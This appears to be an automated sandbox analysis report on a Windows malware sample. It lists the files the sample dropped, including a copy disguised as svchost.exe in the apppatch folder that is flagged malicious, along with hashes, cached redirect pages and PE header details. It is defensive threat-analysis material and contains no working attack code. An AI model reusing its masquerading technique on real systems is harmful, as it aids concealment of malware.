                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.6.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4323.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.553358068733188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYqYm8M4JN/mcFS+q8UejDzHiq9SZcZTd:uIjf/I7ee7VyJN/E98jirZcZTd
                                                                                                                                                                                                            MD5:17C6D9A0F02DB8B74860CC72CEF1B51D
                                                                                                                                                                                                            SHA1:60E9D0ED1947D5D4C726920E79D75C461E342481
                                                                                                                                                                                                            SHA-256:CF385C0C21B79B9F2B620CA6A7FFFAC475AA8FC55293B8F1063E13FE361AD30F
                                                                                                                                                                                                            SHA-512:1369CA2EF83C6C500D242013B417CFD6AA6E2D66213DC04E111EBB165B44E3A40B1F56604BF2C862CAE0E002659168F69F89A8E061192F42F1EBB0F4671C26A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER45E0.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:43 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):95722
                                                                                                                                                                                                            Entropy (8bit):1.8148068482208253
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:LsBCCzOkXo20Sv+BIikvI2zVEmri93YM9:LsAd2zdbY3F
                                                                                                                                                                                                            MD5:0608F8126224868EC417A5035A31F155
                                                                                                                                                                                                            SHA1:7027F75A947C3ED49997F116DCD337896FC285E6
                                                                                                                                                                                                            SHA-256:C725985373EF60A6B548333A261950C937C180D975D0EACB43F320C943423D4E
                                                                                                                                                                                                            SHA-512:82845E3B362321CDB0EAF251A802CAEC112319FD5E0FD44BC68CB7D641421FFA278648E7C63C8FC88DC90C8DBFA0CA48298243868C628E60F2909B2151A11EE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........>2g.........................................>..........T.......8...........T...........0!...T..........P...........<...............................................................................eJ..............GenuineIntel............T.......0....=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER468D.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.7105770756296135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ9e6vL6YWPmSUPgmfv/prB89bwIsfXQm:R6lXJk6T6YfSUPgmfv8w7fF
                                                                                                                                                                                                            MD5:D5E529C318B1D120B0D482E65E11CBEE
                                                                                                                                                                                                            SHA1:EDD46B8F27FB634AB58BBFD9FC341C9BD17B14EA
                                                                                                                                                                                                            SHA-256:C6E7DF7D86F0666A378B229C96F934E2985DDCC22E8F65283BEA7F8764AEEF4D
                                                                                                                                                                                                            SHA-512:21BC703521FDA1D4470EC2EA8136718305DC6B5E16E03FA92F29DB2A952AFAB8BAA2EC47F4A8600D8836DDBDB9CB3C713ADF32B8429157796B525A6C9BEA43C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.2.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER46BD.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.552909948283467
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYSYm8M4JN/mcFZtF+q8Ueg+iq9SZcZId:uIjf/I7ee7V+JN/vtF9L+irZcZId
                                                                                                                                                                                                            MD5:F3D745F6DE16B7E71F158F0E9FBAE6F2
                                                                                                                                                                                                            SHA1:D8D8FBCDB7459AD30B7465383CAFB38F2C668FA8
                                                                                                                                                                                                            SHA-256:01365D32BC152BC0DD095938439C44F0AB46D8E2CF79ED03003DDB23ED442DB3
                                                                                                                                                                                                            SHA-512:F7D0CBE9B23083CF0D9645E44A5AD03A4717025420A6D008D1376596DC6BD94192A41DF955D8DD12938D3C86BECEAB30C231A9FDF9342A0581687DF16B9D9E94
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\login[1].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\login[2].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\login[4].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\login[1].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43073
                                                                                                                                                                                                            Entropy (8bit):6.064287387128941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:CiBtrifZVO7Wg3hIBYzwyXY7JXO4On2pETjNl/yndiGPtYbcq:C8Cg3rrkFO4On2pgh0ZPtYbcq
                                                                                                                                                                                                            MD5:82FC9A40264F88E6415B3105CE175E0B
                                                                                                                                                                                                            SHA1:5209FE92E6AD71C1345786ED60917C64456FEC5D
                                                                                                                                                                                                            SHA-256:406573D06502DBD7E582B08910A66DF11E85B0B6F1EA32BDB9528FDD9C200E82
                                                                                                                                                                                                            SHA-512:E2D2257F3DAFF2AB1161C0B674B69ECACABDA6C206491AC925337017814A8D26139B2EBCA29463C50BB2C883852BCFA27F6950CAC2CC8694B1DC2386A555F9B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\login[2].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\login[4].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):211463
                                                                                                                                                                                                            Entropy (8bit):7.809244509262147
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:x+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:x+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            MD5:3544C1362497D11F8724B63036038086
                                                                                                                                                                                                            SHA1:267152D77D9B1EBD410CC960B39BB65CBFA3DF98
                                                                                                                                                                                                            SHA-256:1AE862E671FF5E3A807B6F04B7BDBFF9D0EBC3B9C29BF57DA5F44359BB0E6B9E
                                                                                                                                                                                                            SHA-512:92FCAAAE9D6314A1AB6927E4AFA99DBE2A493B53A38CC053A949B4724C42C82C6F58FB1C939AD132C6B04F5E0F2F419B160E8DE0A890CAB908D4BD8B6AF82FA7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......*y=.....................................a..........H....................@......................................................................................text..../.......0.................. ..`.dHGmL..=s...@.......4..............@..@.lzmjSu..............:..............@....YOSWO...O...........<..............@..@.sTDEgl.Ct...........B..............@..@.fwQO...zy...`.......J..............@..@.L...................X..............@....D.......@...........Z..............@....data....&.......(...`..............@....kubC...ma..........................@....hkw....Y....p......................@....rsrc...H...........................@..@.reloc.......@.......4..............@..B........................................................................................................

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8092452156144425
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:Z8eHwAvqAh.exe
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5:3ab620205abe34e0bb0a34c253b30cd7
                                                                                                                                                                                                            SHA1:281bff88b708e81638f6c4548d0bac897a059c54
                                                                                                                                                                                                            SHA256:8b72b2f58a4fe3d7be31e9bc4b53c8b21bc3410243325d2ac15627419fd051ff
                                                                                                                                                                                                            SHA512:f62c252f002843fb43ac035d4155293cf15e25d86a87f5415d506f0c07fe9568135c450a27d2a811116ae6fc52a8a470aaed5497f32d7d3b5b4d1666e8736bba
                                                                                                                                                                                                            SSDEEP:6144:T+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:T+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            TLSH:212412E7A7548BAAE9571633A94FC31E516853612F84E453EF01AC2D3CF06E13D7B2A0
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......S.<...................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:000a5575b595b575

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x401000
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x3E74BE7E [Sun Mar 16 18:12:14 2003 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:e7f2d5507b09bfb1c824fe29a99d8a60

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            mov edx, 0042B50Bh
                                                                                                                                                                                                            mov ecx, edx
                                                                                                                                                                                                            add ecx, 000124B4h
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            mov dword ptr [0043D34Bh], 00000000h
                                                                                                                                                                                                            mov ecx, dword ptr [0043D34Bh]
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043DA40h], eax
                                                                                                                                                                                                            xor eax, eax
